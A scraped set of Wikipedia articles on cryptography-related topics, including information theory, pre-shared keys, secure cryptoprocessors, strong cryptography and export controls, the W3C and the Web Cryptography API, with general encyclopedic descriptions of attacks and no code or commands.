information equals the mutual information). Fungible informationis theinformationfor which the means ofencodingis not important.[43]Classical information theorists and computer scientists are mainly concerned with information of this sort. It is sometimes referred as speakable information.[44] Information theoretic concepts apply to cryptography and cryptanalysis. Turing's information unit, theban, was used in theUltraproject, breaking the GermanEnigma machinecode and hastening theend of World War II in Europe. Shannon himself defined an important concept now called theunicity distance. Based on the redundancy of theplaintext, it attempts to give a minimum amount ofciphertextnecessary to ensure unique decipherability. Information theory leads us to believe it is much more difficult to keep secrets than it might first appear. Abrute force attackcan break systems based onasymmetric key algorithmsor on most commonly used methods ofsymmetric key algorithms(sometimes called secret key algorithms), such asblock ciphers. The security of all such methods comes from the assumption that no known attack can break them in a practical amount of time. Information theoretic securityrefers to methods such as theone-time padthat are not vulnerable to such brute force attacks. In such cases, the positive conditional mutual information between the plaintext and ciphertext (conditioned on thekey) can ensure proper transmission, while the unconditional mutual information between the plaintext and ciphertext remains zero, resulting in absolutely secure communications. In other words, an eavesdropper would not be able to improve his or her guess of the plaintext by gaining knowledge of the ciphertext but not of the key. However, as in any other cryptographic system, care must be used to correctly apply even information-theoretically secure methods; theVenona projectwas able to crack the one-time pads of the Soviet Union due to their improper reuse of key material. Pseudorandom number generatorsare widely available in computer language libraries and application programs. They are, almost universally, unsuited to cryptographic use as they do not evade the deterministic nature of modern computer equipment and software. A class of improved random number generators is termedcryptographically secure pseudorandom number generators, but even they requirerandom seedsexternal to the software to work as intended. These can be obtained viaextractors, if done carefully. The measure of sufficient randomness in extractors ismin-entropy, a value related to Shannon entropy throughRényi entropy; Rényi entropy is also used in evaluating randomness in cryptographic systems. Although related, the distinctions among these measures mean that a random variable with high Shannon entropy is not necessarily satisfactory for use in an extractor and so for cryptography uses. One early commercial application of information theory was in the field of seismic oil exploration. Work in this field made it possible to strip off and separate the unwanted noise from the desired seismic signal. Information theory anddigital signal processingoffer a major improvement of resolution and image clarity over previous analog methods.[45] SemioticiansDoede Nauta[nl]andWinfried Nöthboth consideredCharles Sanders Peirceas having created a theory of information in his works on semiotics.[46]: 171[47]: 137Nauta defined semiotic information theory as the study of "the internal processes of coding, filtering, and information processing."[46]: 91 Concepts from information theory such as redundancy and code control have been used by semioticians such asUmberto EcoandFerruccio Rossi-Landi[it]to explain ideology as a form of message transmission whereby a dominant social class emits its message by using signs that exhibit a high degree of redundancy such that only one message is decoded among a selection of competing ones.[48] Quantitative information theoretic methods have been applied incognitive scienceto analyze the integrated process organization of neural information in the context of thebinding problemincognitive neuroscience.[49]In this context, either an information-theoretical measure, such asfunctional clusters(Gerald EdelmanandGiulio Tononi's functional clustering model and dynamic core hypothesis (DCH)[50]) oreffective information(Tononi'sintegrated information theory(IIT) of consciousness[51][52][53]), is defined (on the basis of a reentrant process organization, i.e. the synchronization of neurophysiological activity between groups of neuronal populations), or the measure of the minimization of free energy on the basis of statistical methods (Karl J. Friston'sfree energy principle(FEP), an information-theoretical measure which states that every adaptive change in a self-organized system leads to a minimization of free energy, and theBayesian brainhypothesis[54][55][56][57][58]). Information theory also has applications in thesearch for extraterrestrial intelligence,[59]black holes,[60]bioinformatics,[61]andgambling.[62][63]
https://en.wikipedia.org/wiki/Information_theory
The followingoutlineis provided as an overview of and topical guide to cryptography: Cryptography(orcryptology) – practice and study of hidinginformation. Modern cryptography intersects the disciplines ofmathematics,computer science, andengineering. Applications of cryptography includeATM cards,computer passwords, andelectronic commerce. List of cryptographers
https://en.wikipedia.org/wiki/Outline_of_cryptography
This is alist of cryptographers.Cryptographyis the practice and study of techniques forsecure communicationin the presence of third parties calledadversaries. See also:Category:Modern cryptographersfor a more exhaustive list.
https://en.wikipedia.org/wiki/List_of_cryptographers
Historians and sociologists have remarked the occurrence, inscience, of "multiple independent discovery".Robert K. Mertondefined such "multiples" as instances in which similardiscoveriesare made by scientists working independently of each other.[1]"Sometimes", writes Merton, "the discoveries are simultaneous or almost so; sometimes a scientist will make a new discovery which, unknown to him, somebody else has made years before."[2] Commonly cited examples of multiple independent discovery are the 17th-century independent formulation ofcalculusbyIsaac NewtonandGottfried Wilhelm Leibniz;[3][4]the 18th-century discovery ofoxygenbyCarl Wilhelm Scheele,Joseph Priestley,Antoine Lavoisierand others; and the theory of theevolutionofspecies, independently advanced in the 19th century byCharles DarwinandAlfred Russel Wallace. Multiple independent discovery, however, is not limited to such famous historic instances. Merton believed that it is multiple discoveries, rather than unique ones, that represent thecommonpattern in science.[5] Merton contrasted a "multiple" with a "singleton"—a discovery that has been made uniquely by a single scientist or group of scientists working together.[6] The distinction may blur as science becomes increasingly collaborative.[7] A distinction is drawn between adiscoveryand aninvention, as discussed for example byBolesław Prus.[8]However, discoveries and inventions are inextricably related, in that discoveries lead to inventions, and inventions facilitate discoveries; and since the same phenomenon ofmultiplicityoccurs in relation to both discoveries and inventions, this article lists both multiple discoveries and multipleinventions. "When the time is ripe for certain things, these things appear in different places in the manner of violets coming to light in early spring." "[Y]ou do not [make a discovery] until a background knowledge is built up to a place where it's almost impossible not to see the new thing, and it often happens that the new step is done contemporaneously in two different places in the world, independently." "[A] man can no more be completely original ... than a tree can grow out of air." I never had an idea in my life. My so-called inventions already existed in the environment – I took them out. I've created nothing. Nobody does. There's no such thing as an idea being brain-born; everything comes from the outside. Return to top of page.
https://en.wikipedia.org/wiki/List_of_multiple_discoveries#20th_century
Incryptography, apre-shared key(PSK) is ashared secretwhich was previously shared between the two parties using somesecure channelbefore it needs to be used.[1] To build a key from shared secret, thekey derivation functionis typically used. Such systems almost always usesymmetric keycryptographic algorithms. The term PSK is used inWi-Fiencryption such asWired Equivalent Privacy(WEP),Wi-Fi Protected Access(WPA), where the method is called WPA-PSK or WPA2-PSK, and also in theExtensible Authentication Protocol(EAP), where it is known asEAP-PSK. In all these cases, both thewireless access points(AP) and all clientssharethe same key.[2] The characteristics of this secret or key are determined by the system which uses it; some system designs require that such keys be in a particular format. It can be apassword, apassphrase, or ahexadecimalstring. The secret is used by all systems involved in the cryptographic processes used to secure the traffic between the systems. Crypto systemsrely on one or more keys for confidentiality. One particular attack is always possible against keys, thebrute force key space search attack. A sufficiently long, randomly chosen, key canresistany practical brute force attack, though not in principle if an attacker has sufficient computational power (seepassword strengthandpassword crackingfor more discussion). Unavoidably, however, pre-shared keys are held by both parties to the communication, and so can be compromised at one end, without the knowledge of anyone at the other. There are several tools available to help one choose strong passwords, though doing so over anynetworkconnection is inherently unsafe as one cannot in general know who, if anyone, may be eavesdropping on the interaction. Choosing keys used by cryptographic algorithms is somewhat different in that any pattern whatsoever should be avoided, as any such pattern may provide an attacker with a lower effort attack than brute force search. This impliesrandomkey choice to force attackers to spend as much effort as possible; this is very difficult in principle and in practice as well. As a general rule, any software except acryptographically secure pseudorandom number generator(CSPRNG) should be avoided.
https://en.wikipedia.org/wiki/Pre-shared_key
Asecure cryptoprocessoris a dedicatedcomputer-on-a-chipormicroprocessorfor carrying outcryptographicoperations, embedded in a packaging with multiplephysical securitymeasures, which give it a degree oftamper resistance. Unlike cryptographic processors that output decrypted data onto a bus in a secure environment, a secure cryptoprocessor does not output decrypted data or decrypted program instructions in an environment where security cannot always be maintained. The purpose of a secure cryptoprocessor is to act as the keystone of a security subsystem, eliminating the need to protect the rest of the subsystem with physical security measures.[1] Ahardware security module(HSM) contains one or more secure cryptoprocessorchips.[2][3][4]These devices are high grade secure cryptoprocessors used with enterprise servers. A hardware security module can have multiple levels of physical security with a single-chip cryptoprocessor as its most secure component. The cryptoprocessor does not reveal keys or executable instructions on a bus, except in encrypted form, and zeros keys by attempts at probing or scanning. The crypto chip(s) may also bepottedin the hardware security module with other processors and memory chips that store and process encrypted data. Any attempt to remove the potting will cause the keys in the crypto chip to be zeroed. A hardware security module may also be part of a computer (for example anATM) that operates inside a locked safe to deter theft, substitution, and tampering. Modernsmartcardsare probably the most widely deployed form of secure cryptoprocessor, although more complex and versatile secure cryptoprocessors are widely deployed in systems such asAutomated teller machines, TVset-top boxes, military applications, and high-security portable communication equipment.[citation needed]Some secure cryptoprocessors can even run general-purpose operating systems such asLinuxinside their security boundary. Cryptoprocessors input program instructions in encrypted form, decrypt the instructions to plain instructions which are then executed within the same cryptoprocessor chip where the decrypted instructions are inaccessibly stored. By never revealing the decrypted program instructions, the cryptoprocessor prevents tampering of programs by technicians who may have legitimate access to the sub-system data bus. This is known asbus encryption. Data processed by a cryptoprocessor is also frequently encrypted. TheTrusted Platform Module(TPM) is an implementation of a secure cryptoprocessor that brings the notion oftrusted computingto ordinaryPCsby enabling asecure environment.[citation needed]Present TPM implementations focus on providing a tamper-proof boot environment, and persistent and volatile storage encryption. Security chips for embedded systems are also available that provide the same level of physical protection for keys and other secret material as a smartcard processor or TPM but in a smaller, less complex and less expensive package.[citation needed]They are often referred to as cryptographicauthenticationdevices and are used to authenticate peripherals, accessories and/or consumables. Like TPMs, they are usually turnkey integrated circuits intended to be embedded in a system, usually soldered to a PC board. Security measures used in secure cryptoprocessors: Secure cryptoprocessors, while useful, are not invulnerable to attack, particularly for well-equipped and determined opponents (e.g. a government intelligence agency) who are willing to expend enough resources on the project.[5][6] One attack on a secure cryptoprocessor targeted theIBM 4758.[7]A team at the University of Cambridge reported the successful extraction of secret information from an IBM 4758, using a combination of mathematics, and special-purposecodebreakinghardware. However, this attack was not practical in real-world systems because it required the attacker to have full access to all API functions of the device. Normal and recommended practices use the integral access control system to split authority so that no one person could mount the attack.[citation needed] While the vulnerability they exploited was a flaw in the software loaded on the 4758, and not the architecture of the 4758 itself, their attack serves as a reminder that a security system is only as secure as its weakest link: the strong link of the 4758 hardware was rendered useless by flaws in the design and specification of the software loaded on it. Smartcards are significantly more vulnerable, as they are more open to physical attack. Additionally, hardware backdoors can undermine security in smartcards and other cryptoprocessors unless investment is made in anti-backdoor design methods.[8] In the case offull disk encryptionapplications, especially when implemented without abootPIN, a cryptoprocessor would not be secure against acold boot attack[9]ifdata remanencecould be exploited to dumpmemorycontents after theoperating systemhas retrieved the cryptographickeysfrom itsTPM. However, if all of the sensitive data is stored only in cryptoprocessor memory and not in external storage, and the cryptoprocessor is designed to be unable to reveal keys or decrypted or unencrypted data on chipbonding padsorsolder bumps, then such protected data would be accessible only by probing the cryptoprocessor chip after removing any packaging and metal shielding layers from the cryptoprocessor chip. This would require both physical possession of the device as well as skills and equipment beyond that of most technical personnel. Other attack methods involve carefully analyzing the timing of various operations that might vary depending on the secret value or mapping the current consumption versus time to identify differences in the way that '0' bits are handled internally vs. '1' bits. Or the attacker may apply temperature extremes, excessively high or low clock frequencies or supply voltage that exceeds the specifications in order to induce a fault. The internal design of the cryptoprocessor can be tailored to prevent these attacks. Some secure cryptoprocessors containdual processorcores and generate inaccessible encryption keys when needed so that even if the circuitry is reverse engineered, it will not reveal any keys that are necessary to securely decrypt software booted from encrypted flash memory or communicated between cores.[10] The first single-chip cryptoprocessor design was forcopy protectionof personal computer software (see US Patent 4,168,396, Sept 18, 1979) and was inspired by Bill Gates'sOpen Letter to Hobbyists. Thehardware security module(HSM), a type of secure cryptoprocessor,[3][4]was invented byEgyptian-AmericanengineerMohamed M. Atalla,[11]in 1972.[12]He invented a high security module dubbed the "Atalla Box" which encryptedPINandATMmessages, and protected offline devices with an un-guessable PIN-generating key.[13]In 1972, he filed apatentfor the device.[14]He foundedAtalla Corporation(nowUtimaco Atalla) that year,[12]and commercialized the "Atalla Box" the following year,[13]officially as the Identikey system.[15]It was acard readerandcustomer identification system, consisting of acard readerconsole, two customerPIN pads, intelligent controller and built-in electronic interface package.[15]It allowed the customer to type in a secret code, which is transformed by the device, using amicroprocessor, into another code for the teller.[16]During atransaction, the customer'saccount number was read by the card reader.[15]It was a success, and led to the wide use of high security modules.[13] Fearful that Atalla would dominate the market, banks andcredit cardcompanies began working on an international standard in the 1970s.[13]TheIBM 3624, launched in the late 1970s, adopted a similar PIN verification process to the earlier Atalla system.[17]Atalla was an early competitor toIBMin the banking security market.[14][18] At the National Association of Mutual Savings Banks (NAMSB) conference in January 1976, Atalla unveiled an upgrade to its Identikey system, called the Interchange Identikey. It added the capabilities ofprocessingonline transactionsand dealing withnetwork security. Designed with the focus of takingbank transactionsonline, the Identikey system was extended to shared-facility operations. It was consistent and compatible with variousswitchingnetworks, and was capable of resetting itself electronically to any one of 64,000 irreversiblenonlinearalgorithmsas directed bycard datainformation. The Interchange Identikey device was released in March 1976.[16]Later in 1979, Atalla introduced the firstnetwork security processor(NSP).[19]Atalla's HSM products protect 250millioncard transactionsevery day as of 2013,[12]and secure the majority of the world's ATM transactions as of 2014.[11]
https://en.wikipedia.org/wiki/Secure_cryptoprocessor
Strong cryptographyorcryptographically strongare general terms used to designate thecryptographic algorithmsthat, when used correctly, provide a very high (usually insurmountable) level of protection against anyeavesdropper, including the government agencies.[1]There is no precise definition of the boundary line between the strong cryptography and (breakable)weak cryptography, as this border constantly shifts due to improvements in hardware andcryptanalysistechniques.[2]These improvements eventually place the capabilities once available only to theNSAwithin the reach of a skilled individual,[3]so in practice there are only two levels of cryptographic security, "cryptography that will stop your kid sister from reading your files, and cryptography that will stop major governments from reading your files" (Bruce Schneier).[2] The strong cryptography algorithms have highsecurity strength, for practical purposes usually defined as a number of bits in thekey. For example, the United States government, when dealing withexport control of encryption, considered as of 1999[update]any implementation of thesymmetric encryptionalgorithm with thekey lengthabove 56 bits or itspublic keyequivalent[4]to be strong and thus potentially a subject to theexport licensing.[5]To be strong, an algorithm needs to have a sufficiently long key and be free of known mathematical weaknesses, as exploitation of these effectively reduces the key size. At the beginning of the 21st century, the typical security strength of the strong symmetrical encryption algorithms is 128 bits (slightly lower values still can be strong, but usually there is little technical gain in using smaller key sizes).[5][needs update] Demonstrating the resistance of any cryptographic scheme to attack is a complex matter, requiring extensive testing and reviews, preferably in a public forum. Goodalgorithmsand protocols are required (similarly, good materials are required to construct a strong building), but good system design and implementation is needed as well: "it is possible to build a cryptographically weak system using strong algorithms and protocols" (just like the use of good materials in construction does not guarantee a solid structure). Many real-life systems turn out to be weak when the strong cryptography is not used properly, for example, randomnoncesare reused[6]A successful attack might not even involve algorithm at all, for example, if the key is generated from a password, guessing a weak password is easy and does not depend on the strength of the cryptographic primitives.[7]A user can become the weakest link in the overall picture, for example, by sharing passwords and hardware tokens with the colleagues.[8] The level of expense required for strong cryptography originally restricted its use to the government and military agencies,[9]until the middle of the 20th century the process of encryption required a lot of human labor and errors (preventing the decryption) were very common, so only a small share of written information could have been encrypted.[10]US government, in particular, was able to keep a monopoly on the development and use of cryptography in the US into the 1960s.[11]In the 1970, the increased availability of powerful computers and unclassified research breakthroughs (Data Encryption Standard, theDiffie-HellmanandRSAalgorithms) made strong cryptography available for civilian use.[12]Mid-1990s saw the worldwide proliferation of knowledge and tools for strong cryptography.[12]By the 21st century the technical limitations were gone, although the majority of the communication were still unencrypted.[10]At the same the cost of building and running systems with strong cryptography became roughly the same as the one for the weak cryptography.[13] The use of computers changed the process of cryptanalysis, famously withBletchley Park'sColossus. But just as the development of digital computers and electronics helped in cryptanalysis, it also made possible much more complex ciphers. It is typically the case that use of a quality cipher is very efficient, while breaking it requires an effort many orders of magnitude larger - making cryptanalysis so inefficient and impractical as to be effectively impossible. This term "cryptographically strong" is often used to describe anencryptionalgorithm, and implies, in comparison to some other algorithm (which is thus cryptographically weak), greater resistance to attack. But it can also be used to describe hashing and unique identifier and filename creation algorithms. See for example the description of the Microsoft .NET runtime library function Path.GetRandomFileName.[14]In this usage, the term means "difficult to guess". An encryption algorithm is intended to be unbreakable (in which case it is as strong as it can ever be), but might be breakable (in which case it is as weak as it can ever be) so there is not, in principle, a continuum of strength as theidiomwould seem to imply: Algorithm A is stronger than Algorithm B which is stronger than Algorithm C, and so on. The situation is made more complex, and less subsumable into a single strength metric, by the fact that there are many types ofcryptanalyticattack and that any given algorithm is likely to force the attacker to do more work to break it when using one attack than another. There is only one known unbreakable cryptographic system, theone-time pad, which is not generally possible to use because of the difficulties involved in exchanging one-time pads without them being compromised. So any encryption algorithm can be compared to the perfect algorithm, the one-time pad. The usual sense in which this term is (loosely) used, is in reference to a particular attack,brute forcekey search — especially in explanations for newcomers to the field. Indeed, with this attack (always assuming keys to have been randomly chosen), there is a continuum of resistance depending on the length of the key used. But even so there are two major problems: many algorithms allow use of different length keys at different times, and any algorithm can forgo use of the full key length possible. Thus,BlowfishandRC5areblock cipheralgorithms whose design specifically allowed for severalkey lengths, and who cannot therefore be said to have any particular strength with respect to brute force key search. Furthermore, US export regulations restrict key length for exportable cryptographic products and in several cases in the 1980s and 1990s (e.g., famously in the case ofLotus Notes' export approval) only partial keys were used, decreasing 'strength' against brute force attack for those (export) versions. More or less the same thing happened outside theUSas well, as for example in the case of more than one of the cryptographic algorithms in theGSMcellular telephone standard. The term is commonly used to convey that some algorithm is suitable for some task incryptographyorinformation security, but also resistscryptanalysisand has no, or fewer, security weaknesses. Tasks are varied, and might include: Cryptographically strongwould seem to mean that the described method has some kind of maturity, perhaps even approved for use against different kinds of systematic attacks in theory and/or practice. Indeed, that the method may resist those attacks long enough to protect the information carried (and what stands behind the information) for a useful length of time. But due to the complexity and subtlety of the field, neither is almost ever the case. Since such assurances are not actually available in real practice, sleight of hand in language which implies that they are will generally be misleading. There will always be uncertainty as advances (e.g., in cryptanalytic theory or merely affordable computer capacity) may reduce the effort needed to successfully use some attack method against an algorithm. In addition, actual use of cryptographic algorithms requires their encapsulation in acryptosystem, and doing so often introduces vulnerabilities which are not due to faults in an algorithm. For example, essentially all algorithms require random choice of keys, and any cryptosystem which does not provide such keys will be subject to attack regardless of any attack resistant qualities of the encryption algorithm(s) used. Widespread use of encryption increases the costs ofsurveillance, so the government policies aim to regulate the use of the strong cryptography.[15]In the 2000s, the effect of encryption on the surveillance capabilities was limited by the ever-increasing share of communications going through the global social media platforms, that did not use the strong encryption and provided governments with the requested data.[16]Murphy talks about a legislative balance that needs to be struck between the power of the government that are broad enough to be able to follow the quickly-evolving technology, yet sufficiently narrow for the public and overseeing agencies to understand the future use of the legislation.[17] The initial response of the US government to the expanded availability of cryptography was to treat the cryptographic research in the same way theatomic energyresearch is, i.e., "born classified", with the government exercising the legal control of dissemination of research results. This had quickly found to be impossible, and the efforts were switched to the control over deployment (export, as prohibition on the deployment of cryptography within the US was not seriously considered).[18] The export control in the US historically uses two tracks:[19] Since the original applications of cryptography were almost exclusively military, it was placed on the munitions list. With the growth of the civilian uses, the dual-use cryptography was defined bycryptographic strength, with the strong encryption remaining a munition in a similar way to the guns (small armsare dual-use while artillery is of purely military value).[20]This classification had its obvious drawbacks: a major bank is arguably just as systemically important as a military installation,[20]and restriction on publishing the strong cryptography code run against theFirst Amendment, so after experimenting in 1993 with theClipper chip(where the US government kept special decryption keys inescrow), in 1996 almost all cryptographic items were transferred to the Department of Commerce.[21] The position of the EU, in comparison to the US, had always been tilting more towards privacy. In particular, EU had rejected thekey escrowidea as early as 1997.European Union Agency for Cybersecurity(ENISA) holds the opinion that thebackdoorsare not efficient for the legitimate surveillance, yet pose great danger to the general digital security.[15] TheFive Eyes(post-Brexit) represent a group of states with similar views one the issues of security and privacy. The group might have enough heft to drive the global agenda on thelawful interception. The efforts of this group are not entirely coordinated: for example, the 2019 demand for Facebook not to implementend-to-end encryptionwas not supported by either Canada or New Zealand, and did not result in a regulation.[17] President and government of Russia in 90s has issued a few decrees formally banning uncertified cryptosystems from use by government agencies. Presidential decree of 1995 also attempted to ban individuals from producing and selling cryptography systems without having appropriate license, but it wasn't enforced in any way as it was suspected to be contradictory theRussian Constitution of 1993and wasn't a law per se.[22][23][24][note 1]The decree of No.313 issued in 2012 further amended previous ones allowing to produce and distribute products with embedded cryptosystems and requiring no license as such, even though it declares some restrictions.[25][26]Francehad quite strict regulations in this field, but has relaxed them in recent years.[citation needed] Examples that are not considered cryptographically strong include:
https://en.wikipedia.org/wiki/Strong_cryptography
Syllabical and Steganographical Table(French:Tableau syllabique et stéganographique) is an eighteenth-centurycryptographicalwork by P. R. Wouves. Published byBenjamin Franklin Bachein 1797, it provided a method for representing pairs of letters by numbers. It may have been the first chart for cryptographic purposes to have been printed in the United States.[1][2]
https://en.wikipedia.org/wiki/Syllabical_and_Steganographical_Table
TheWorld Wide Web Consortium(W3C) is the main internationalstandards organizationfor theWorld Wide Web. Founded in 1994 byTim Berners-Lee, theconsortiumis made up of member organizations that maintain full-time staff working together in the development of standards for the World Wide Web. As of May 2025,[update]W3C has 350 members.[3]The organization has been led by CEO Seth Dobbs since October 2023.[4]W3C also engages in education and outreach, develops software and serves as an open forum for discussion about the Web. The World Wide Web Consortium (W3C) was founded in 1994 byTim Berners-Leeafter he left the European Organization for Nuclear Research (CERN) in October 1994.[5]It was founded at theMassachusetts Institute of Technology(MIT)Laboratory for Computer Sciencewith support from theEuropean Commission, and theDefense Advanced Research Projects Agency, which had pioneered theARPANET, the most direct predecessor to the modernInternet.[6]It was located inTechnology Squareuntil 2004, when it moved, with the MIT Computer Science and Artificial Intelligence Laboratory, to the Stata Center.[7] The organization tries to foster compatibility and agreement among industry members in the adoption of new standards defined by the W3C. Incompatible versions ofHTMLare offered by different vendors, causing inconsistency in how web pages are displayed. The consortium tries to get all those vendors to implement a set of core principles and components that are chosen by the consortium. It was originally intended that CERN host the European branch of W3C; however, CERN wished to focus onparticle physics, notinformation technology. In April 1995, theFrench Institute for Research in Computer Science and Automationbecame the European host of W3C, withKeio UniversityResearch Institute atSFCbecoming the Asian host in September 1996.[8]Starting in 1997, W3C created regional offices around the world. As of September 2009, it had eighteen World Offices covering Australia, theBeneluxcountries (Belgium, Netherlands and Luxembourg), Brazil, China, Finland, Germany, Austria, Greece, Hong Kong, Hungary, India, Israel, Italy, South Korea, Morocco, South Africa, Spain, Sweden, and, as of 2016, the United Kingdom and Ireland.[9] In October 2012, W3C convened a community of major web players and publishers to establish aMediaWikiwiki that seeks to document open web standards called theWebPlatformand WebPlatform Docs. In January 2013,Beihang Universitybecame the Chinese host.[10] In 2022 the W3C WebFonts Working Group won an Emmy Award from theNational Academy of Television Arts and Sciencesfor standardizing font technology for custom downloadable fonts and typography for web and TV devices.[11] On 1 January 2023, it reformed as a public-interest501(c)(3)non-profit organization.[12][13]In October 2023, Seth Dobbs was named as the organization's chief executive officer.[4] W3C develops technical specifications forHTML5,CSS,SVG,WOFF, theSemantic Web stack,XML, and other technologies.[14]Sometimes, when a specification becomes too large, it is split into independent modules that can mature at their own pace. Subsequent editions of a module or specification are known as levels and are denoted by the first integer in the title (e.g. CSS3 = Level 3). Subsequent revisions on each level are denoted by an integer following a decimal point (for example, CSS2.1 = Revision 1). The W3C standard formation process is defined within the W3C process document, outlining four maturity levels through which each new standard or recommendation must progress.[15] After enough content has been gathered from 'editor drafts' and discussion, it may be published as a working draft (WD) for review by the community. A WD document is the first form of a standard that is publicly available. Commentary by virtually anyone is accepted, though no promises are made with regard to action on any particular element commented upon.[15] At this stage, the standard document may have significant differences from its final form. As such, anyone who implements WD standards should be ready to significantly modify their implementations as the standard matures.[15] A candidate recommendation is a version of a more mature standard than the WD. At this point, the group responsible for the standard is satisfied that the standard meets its goal. The purpose of the CR is to elicit aid from the development community on how implementable the standard is.[15] The standard document may change further, but significant features are mostly decided at this point. The design of those features can still change due to feedback from implementors.[15] A proposed recommendation is the version of a standard that has passed the prior two levels. The users of the standard provide input. At this stage, the document is submitted to the W3C Advisory Council for final approval.[15] While this step is important, it rarely causes any significant changes to a standard as it passes to the next phase.[15] This is the most mature stage of development. At this point, the standard has undergone extensive review and testing, under both theoretical and practical conditions. The standard is now endorsed by the W3C, indicating its readiness for deployment to the public, and encouraging more widespread support among implementors and authors.[15] Recommendations can sometimes be implemented incorrectly, partially, or not at all, but many standards define two or more levels of conformance that developers must follow if they wish to label their product as W3C-compliant.[15] A recommendation may be updated or extended by separately-published, non-technicalerrataor editor drafts until sufficient substantial edits accumulate for producing a new edition or level of the recommendation. Additionally, the W3C publishes various kinds of informative notes which are to be used as references.[15] Unlike theInternet Societyand other international standards bodies, the W3C does not have a certification program. The W3C has decided, for now, that it is not suitable to start such a program, owing to the risk of creating more drawbacks for the community than benefits.[15] In January 2023, after 28 years of being jointly administered by theMIT Computer Science and Artificial Intelligence Laboratory(located inStata Center) in the United States, the[clarification needed][16](inSophia Antipolis, France),Keio University(in Japan) andBeihang University(in China), the W3C incorporated as a legal entity, becoming apublic-interestnot-for-profit organization.[17] The W3C has a staff team of 70–80 worldwide as of 2015[update].[18]W3C is run by a management team which allocates resources and designs strategy, led by CEO Jeffrey Jaffe[19](as of March 2010), former CTO ofNovell. It also includes an advisory board that supports strategy and legal matters and helps resolve conflicts.[20][21]The majority of standardization work is done by external experts in the W3C's various working groups.[22] The Consortium is governed by its membership. The list of members is available to the public.[2]Members include businesses, nonprofit organizations, universities, governmental entities, and individuals.[23] Membership requirements are transparent except for one requirement: An application for membership must be reviewed and approved by the W3C. Many guidelines and requirements are stated in detail, but there is no final guideline about the process or standards by which membership might be finally approved or denied.[24] The cost of membership is given on a sliding scale, depending on the character of the organization applying and the country in which it is located.[25]Countries are categorized by theWorld Bank's most recent grouping bygross national incomeper capita.[26] In 2012 and 2013, the W3C started considering addingDRM-specificEncrypted Media Extensions(EME) toHTML5, which was criticised as being against the openness, interoperability, and vendor neutrality that distinguished websites built using only W3C standards from those requiring proprietaryplug-inslikeFlash.[27][28][29][30][31]On 18 September 2017, the W3C published the EME specification as a recommendation, leading to theElectronic Frontier Foundation's resignation from W3C.[32][33]As feared by the opponents of EME, as of 2020[update], none of the widely usedContent Decryption Modulesused with EME are available for licensing without a per-browser licensing fee.[34][35] W3C/Internet Engineering Task Forcestandards (overInternet protocol suite):
https://en.wikipedia.org/wiki/World_Wide_Web_Consortium
TheWeb Cryptography APIis theWorld Wide Web Consortium’s (W3C) recommendation for a low-level interface that would increase the security ofweb applicationsby allowing them to performcryptographic functionswithout having to access raw keying material.[1]This agnosticAPIwould perform basic cryptographic operations, such ashashing,signature generationand verification andencryptionas well asdecryptionfrom within a web application.[2] On 26 January 2017, theW3Creleased its recommendation for a Web Cryptography API[3]that could perform basic cryptographic operations in web applications. This agnostic API would utilizeJavaScriptto perform operations that would increase the security of data exchange withinweb applications. The API would provide a low-level interface to create and/or managepublic keysandprivate keysforhashing,digital signaturegeneration and verification andencryptionanddecryptionfor use with web applications. The Web Cryptography API could be used for a wide range of uses, including: Because the Web Cryptography API is agnostic in nature, it can be used on anyplatform. It would provide a common set ofinterfacesthat would permitweb applicationsandprogressive web applicationsto conduct cryptographic functions without the need to access raw keying material. This would be done with the assistance of the SubtleCrypto interface, which defines a group of methods to perform the above cryptographic operations. Additional interfaces within the Web Cryptography API would allow for key generation, key derivation and key import and export.[1] The W3C’s specification for the Web Cryptography API places focus on the common functionality and features that currently exist between platform-specific and standardized cryptographic APIs versus those that are known to just a few implementations. The group’s recommendation for the use of the Web Cryptography API does not dictate that a mandatory set of algorithms must be implemented. This is because of the awareness that cryptographic implementations will vary amongst conforming user agents because ofgovernment regulations, localpolicies, securitypracticesandintellectual propertyconcerns. There are many types of existing web applications that the Web Cryptography API would be well suited for use with.[1] Todaymulti-factor authenticationis considered one of the most reliable methods for verifying the identity of a user of a web application, such asonline banking. Many web applications currently depend on this authentication method to protect both the user and theuser agent. With the Web Cryptography API, a web application would have the ability to provide authentication from within itself instead of having to rely on transport-layer authentication to secret keying material to authenticate user access. This process would provide a richer experience for the user. The Web Cryptography API would allow the application to locate suitable client keys that were previously created by the user agent or had been pre-provisioned by the web application. The application would be able to give the user agent the ability to either generate a new key or re-use an existing key in the event the user does not have a key already associated with their account. By binding this process to theTransport Layer Securitythat the user is authenticating through, the multi-factor authentication process can be additionally strengthened by the derivation of a key that is based on the underlying transport.[1][2] The API can be used to protect sensitive or confidential documents from unauthorized viewing from within a web application, even if they have been previously securely received. The web application would use the Web Cryptography API to encrypt the document with a secret key and then wrap it with public keys that have been associated with users who are authorized to view the document. Upon navigating to the web application, the authorized user would receive the document that had been encrypted and would be instructed to use their private key to begin the unwrapping process that would allow them to decrypt and view the document.[2] Many businesses and individuals rely oncloud storage. For protection, remote service provide might want their web application to give users the ability to protect their confidential documents before uploading their documents or other data. The Web Cryptography API would allow users to: The ability to electronically sign documents saves time, enhances the security of important documents and can serve as legal proof of a user’s acceptance of a document. Many web applications choose to acceptelectronic signaturesinstead of requiring written signatures. With the Web Cryptography API, a user would be prompted to choose a key that could be generated or pre-provisioned specifically for the web application. The key could then be used during the signing operation. Web applications often cache data locally, which puts the data at risk for compromise if an offline attack were to occur. The Web Cryptography API permits the web application to use apublic keydeployed from within itself to verify theintegrityof the data cache.[2] The Web Cryptography API can enhance the security ofmessagingfor use inoff-the-record (OTR)and other types of message-signing schemes through the use of key agreement. The message sender and intended recipient would negotiate shared encryption andmessage authentication code(MAC) keys to encrypt and decrypt messages to prevent unauthorized access.[2] The Web Cryptography API can be used by web applications to interact with message formats and structures that are defined under JOSE Working Group.[4]The application can read and importJSON Web Signature(JWK) keys, validate messages that have been protected through electronic signing orMACkeys and decrypt JWE messages. The W3C recommends that vendors avoid using vendor-specific proprietary extensions with specifications for the Web Cryptography API. This is because it could reduce the interoperability of the API and break up the user base since not all users would be able to access the particular content. It is recommended that when a vendor-specific extension cannot be avoided, the vendor should prefix it with vendor-specific strings to prevent clashes with future generations of the API’s specifications.
https://en.wikipedia.org/wiki/Web_Cryptography_API
